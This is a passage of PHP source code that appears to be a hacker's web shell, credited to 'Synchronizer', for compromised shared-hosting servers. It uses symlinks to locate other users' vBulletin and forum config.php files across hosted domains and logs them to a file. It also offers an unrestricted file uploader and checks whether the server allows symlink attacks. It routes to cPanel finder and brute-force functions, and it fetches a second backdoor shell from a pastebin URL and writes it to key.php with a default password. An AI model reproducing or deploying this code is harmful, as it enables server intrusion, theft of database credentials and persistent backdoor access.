2023. $f = fopen('vb.txt','w');
2024. foreach($d00m as $dom){
2025.  
2026. if(eregi("zone",$dom)){
2027.  
2028. preg_match_all('#zone "(.*)"#', $dom, $domsws);
2029.  
2030. if(strlen(trim($domsws[1][0])) > 2){
2031.  
2032. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
2033.  
2034. ///////////////////////////////////////////////////////////////////////////////////
2035.  
2036. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
2037. $wpp=get_headers($wpl);
2038. $wp=$wpp[0];
2039.  
2040. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
2041. $wpp2=get_headers($wp2);
2042. $wp12=$wpp2[0];
2043.  
2044. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
2045. $wpp3=get_headers($wp3);
2046. $wp13=$wpp3[0];
2047.  
2048.  
2049.  ////////// vb ////////////
2050.  
2051. $pos = strpos($wp, "200");
2052. $config="&nbsp;";
2053.  
2054. if (strpos($wp, "200") == true )
2055. {
2056.  $config= $wpl;
2057. }
2058. elseif (strpos($wp12, "200") == true)
2059. {
2060.   $config= $wp2;
2061. }
2062. elseif (strpos($wp13, "200") == true)
2063. {
2064.   $config= $wp3;
2065. }
2066. else
2067. {
2068. continue;
2069.  
2070. }
2071. flush();
2072.  
2073. /////////////////////////////////////////////////////////////////////////////////////
2074.  
2075. $dom = $domsws[1][0];
2076.  
2077. $w = fwrite($f,"$config||$dom \n");
2078. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
2079.  
2080.  
2081. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
2082. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
2083.  
2084.  
2085.  
2086.  
2087.  
2088. flush();
2089.  
2090.  
2091. }
2092. }
2093. }
2094. }
2095.  
2096.  
2097.  
2098.  
2099.  
2100.  
2101.  
2102.  
2103. break;
2104.  
2105. case 'help':
2106.  
2107. echo "<div class='tmp'>
2108. <table align='center' width='40%'><td>function</td><td>Case</td>";
2109.  
2110.  
2111. $safe_mode = ini_get('safe_mode');
2112.      if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2113.  
2114. echo "<tr><td>Safe Mode</td><td>$r</td>";
2115.  
2116. $fun = function_exists('symlink');
2117.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2118.  
2119. echo "<tr><td>function symlink</td><td>$r</td>";
2120.  
2121.  
2122. $fun = function_exists('file');
2123.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2124.  
2125. echo "<tr><td>function file</td><td>$r</td>";
2126.  
2127. $fun = function_exists('file_get_contents');
2128.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2129.  
2130. echo "<tr><td>function file_get_contents</td><td>$r</td>";
2131.  
2132. $fun = function_exists('mkdir');
2133.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2134.  
2135. echo "<tr><td>function mkdir</td><td>$r</td>";
2136.  
2137.  
2138. $fun = is_dir('sym/root');
2139.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
2140.  
2141. echo "<tr><td>Permission denied</td><td>$r</td>";
2142.  
2143.  
2144. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
2145.      if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
2146.  
2147. echo "<tr><td>Forbidden</td><td>$r</td>";
2148.  
2149.  
2150.  
2151.  
2152. echo "</table></div>";
2153.  
2154.  
2155.  
2156. break;
2157. default:
2158. header("Location: $pg");
2159.  
2160.  
2161.  
2162.  
2163. }
2164.  
2165.  
2166. /// home ///
2167. }else
2168. {
2169.  
2170.  
2171. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
2172. echo '<input type="file" class="wkwk" name="file" value="Choose file" size="60" ><input class="wkwk" name="_upl" type="submit" id="_upl" value="Upload"></form>';
2173. if( $_POST['_upl'] == "Upload" ) {
2174.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
2175.     else { echo '<br /><br />Not uploaded !!<br><br>'; }
2176.  
2177.  
2178. }
2179.  
2180. }
2181.  
2182.  
2183. function ex($text,$a,$b){
2184. $explode = explode($a,$text);
2185. $explode = explode($b,$explode[1]);
2186. return $explode[0];
2187. }
2188.  
2189.  
2190.  
2191. echo '
2192.  
2193. </body>
2194.  
2195. </html>
2196. ';
2197. }
2198. function keydownshell() {
2199. $x = file_get_contents('http://pastebin.com/raw/Cfnqtyba');
2200. $fp=fopen("key.php","a");
2201. fwrite($fp, $x );
2202. fclose($fp);
2203. $panggil = file_get_contents('key.php');
2204. if(preg_match('/SYNCHRONIZER/', $panggil)) {
2205.     echo '<Br><Br><br>KeyDown Shell Backdoor Import success !<br>
2206.     Open shell here ==> <a href="key.php">key.php</a><br><br>
2207.     default password : key<br><Br><Br>
2208.     ';
2209. }
2210. }
2211. if($_GET['keydown'] == 'config') {
2212.    
2213.    $anmcoder = config();
2214.  
2215. } elseif($_GET['keydown'] == 'cpfinder') {
2216.     $anmcoder = cpfinder();
2217.  
2218. } elseif($_GET['keydown'] == 'cpbrute') {
2219.     $anmcoder = cpcrack();
2220.  
2221. } elseif($_GET['keydown'] == 'symlink') {
2222.     $anmcoder = symlinkbro();
2223.  
2224. } elseif($_GET['keydown'] == 'keydownshell') {
2225.     $anmcoder = keydownshell();
2226.  
2227. } else {
2228.     $anmcoder = uploader();
2229. }
2230. ?>
2231. <br/><br/>
2232.  
2233. <?php
2234. echo $anmcoder;
2235. ?>
2236.  
2237. <br/><br/>
2238.  
2239. </center>
2240. </div>
2241.  
2242. <div class="container">
2243. <table width=76% align=center>
2244.   <tr>
2245.   <td class="wkwk" style="text-align:center;background:teal;padding-top:15px;height:40px;" align=center>
2246.   <font color=white><h3>Coded by Synchronizer</h3>
2247.   <font color=white><h4>&copy 2016 - All Rights Reserved.</h4>
2248.   <br/></font></td></tr></table></div>